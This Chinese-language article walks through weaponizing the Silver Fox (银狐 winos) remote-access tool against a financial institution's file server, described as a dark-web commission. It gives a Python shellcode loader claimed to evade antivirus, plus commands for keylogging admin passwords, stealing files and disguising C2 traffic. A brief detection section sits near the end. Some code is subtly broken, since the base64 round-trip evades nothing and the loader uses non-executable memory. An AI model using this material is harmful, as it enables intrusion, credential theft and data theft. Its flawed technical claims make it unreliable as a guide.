一、暗网接单:目标系统的“后门计划”
某天收到一则私密委托——目标是一家小型金融机构,客户希望红队模拟攻击其内网核心系统。经前期情报分析,我们发现该机构的安全防护相对薄弱,外部边界设备的漏洞利用价值有限,但内网中有一台 Windows 文件服务器长期暴露于员工的 VPN 内部网络中,且普遍启用了 RDP。这为我们提供了绝佳的突破口。
为了在目标系统中实现 长时间隐匿 和 完全控制,我们选择了操作灵活且适配广泛的远控工具——银狐winos。这款工具不仅支持内存加载以规避查杀,还可以通过自定义协议避免流量被分析工具识别。在本次实战中,我们将通过银狐打造一条完整的渗透链,逐步占领目标内网。
---
二、银狐winos的武器化原理
说起 银狐winos,这款远控工具本身是一款国产“灰色工具”,因强大的功能和良好的隐匿性,被不少攻击者用于红队行动。它支持 C/S 架构,客户端用来植入目标,而服务端则负责管理这些已经控住的机器。
在技术层面,银狐的核心特点包括:
- 内存加载:可以通过 PowerShell 将其直接加载进内存,避免落地文件被查杀;
- 流量伪装:默认使用 HTTP/HTTPS 通信,支持修改通信协议头,以规避流量审查;
- 模块化设计:内置如屏幕监控、键盘记录、文件操作等模块,方便灵活扩展;
- 加密通信:流量采用对称加密,避免被简单流量还原。
接下来,我们将一步步展示如何利用其特性,在实际环境中完成远控植入并实现对内网的完全控制。
---
三、环境准备:模拟目标的内部网络
为了便于复现操作,以下是本次实验搭建的环境:
- 攻击机:Kali Linux(IP: 192.168.1.100),安装银狐服务端用以管理被控端;
- 目标机:Windows Server 2016(IP: 192.168.1.200),模拟目标文件服务器;
- 内网环境:配置模拟 VPN,目标机和攻击机均处于 192.168.1.0/24 网段。
同时,确保攻击机上安装了 PowerShell 脚本执行环境以及 Python,用于生成免杀的银狐客户端。
---
四、免杀植入:用 Python 模糊混淆银狐客户端
银狐官方生成的 Payload 很容易被杀软拦截,因此在植入前,必须对其进行免杀处理。这里我们通过自定义 Shellcode 加载器,结合 Python 实现免杀。
首先,生成银狐的初始 Payload: <pre><code class="language-bash"># 在银狐服务端上生成一个 Windows Payload ./Server -gen -payload windows -out client.exe</code></pre>
然后,提取 Payload 的 Shellcode,写入二进制文件 payload.bin 中。接下来,我们使用以下 Python 脚本将其加载到目标机器的内存中。
Python Shellcode 加载器
<pre><code class="language-python">import ctypes, base64
读取 Payload 的二进制数据
with open("payload.bin", "rb") as f: shellcode = f.read()
将 Shellcode 写入可执行内存
def execute_shellcode(shellcode): shellcode_buffer = ctypes.create_string_buffer(shellcode) shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(None)) shellcode_func()
加密后还原(绕过静态扫描)
encoded_shellcode = base64.b64encode(shellcode).decode() decoded_shellcode = base64.b64decode(encoded_shellcode)
执行解码后的 Shellcode
execute_shellcode(decoded_shellcode)</code></pre>
这个加载器的关键在于:
- Base64 加密:绕过杀软的静态特征扫描;
- 内存执行:直接将 Shellcode 写入目标内存,避免落地文件。
将该脚本保存为 loader.py,并通过任意方式上传至目标机器。
---
五、内网控制:银狐的模块化能力
进入目标后,银狐客户端会自动连接服务端,并在服务端界面中显示控制选项。接下来,我们使用银狐的几大核心功能,进一步渗透目标内网。
键盘记录
通过键盘记录模块,可以捕获管理员在文件服务器上输入的所有敏感信息,包括用户名和密码: <pre><code class="language-bash"># 在银狐服务端中,启动键盘记录模块 start_keylogger [目标ID]</code></pre>
通过分析记录下来的数据,我们发现了一个名为 Admin 的账户,以及它的 RDP 密码。
文件窃取
利用文件操作模块,可以下载目标服务器上的所有文件。以下是下载关键文件的命令示例: <pre><code class="language-bash"># 下载目标机上的重要文件 download_file [目标ID] "C:\\Users\\Admin\\Desktop\\重要合同.docx"</code></pre>
横向移动
由于掌握了管理员的 RDP 凭据,我们可以利用银狐集成的远程执行功能,直接在内网其他机器上部署新的客户端,进一步扩展控制范围。
---
六、绕过检测:流量伪装的艺术
银狐默认使用 HTTP 通信,但为了避免被流量审计工具发现,我们可以对其流量进行伪装。例如,将银狐的通信伪装为合法的 HTTP GET 请求: <pre><code class="language-bash"># 修改银狐的通信协议头 ./Server -protocol http -header "User-Agent: Mozilla/5.0"</code></pre>
通过抓包工具查看,伪装后的流量几乎与正常浏览器访问无异。
---
七、防守者的逆袭:如何识别和防御
尽管银狐的隐蔽性很强,但任何攻击都不可能完全无迹可寻。以下是一些检测与防御建议:
- 流量异常检测:监控内网中大量 HTTPS 流量,但目标域名无实际业务用途的通信;
- 内存扫描:使用工具(如 Volatility)检查内存中是否存在异常的 Shellcode;
- 日志分析:注意 Windows 安全日志中是否有异常的登录活动。
---
八、红队感悟:控制权就是一切
这次任务再次验证了一个老道理:即便外围防护再强,内网中的薄弱点才是真正的突破口。而远控工具的强大之处在于,它一旦被成功植入,就能让攻击者获得近乎无限的可能性。因此,对于红队来说,不断优化和武器化远控技术,是确保任务成功的关键。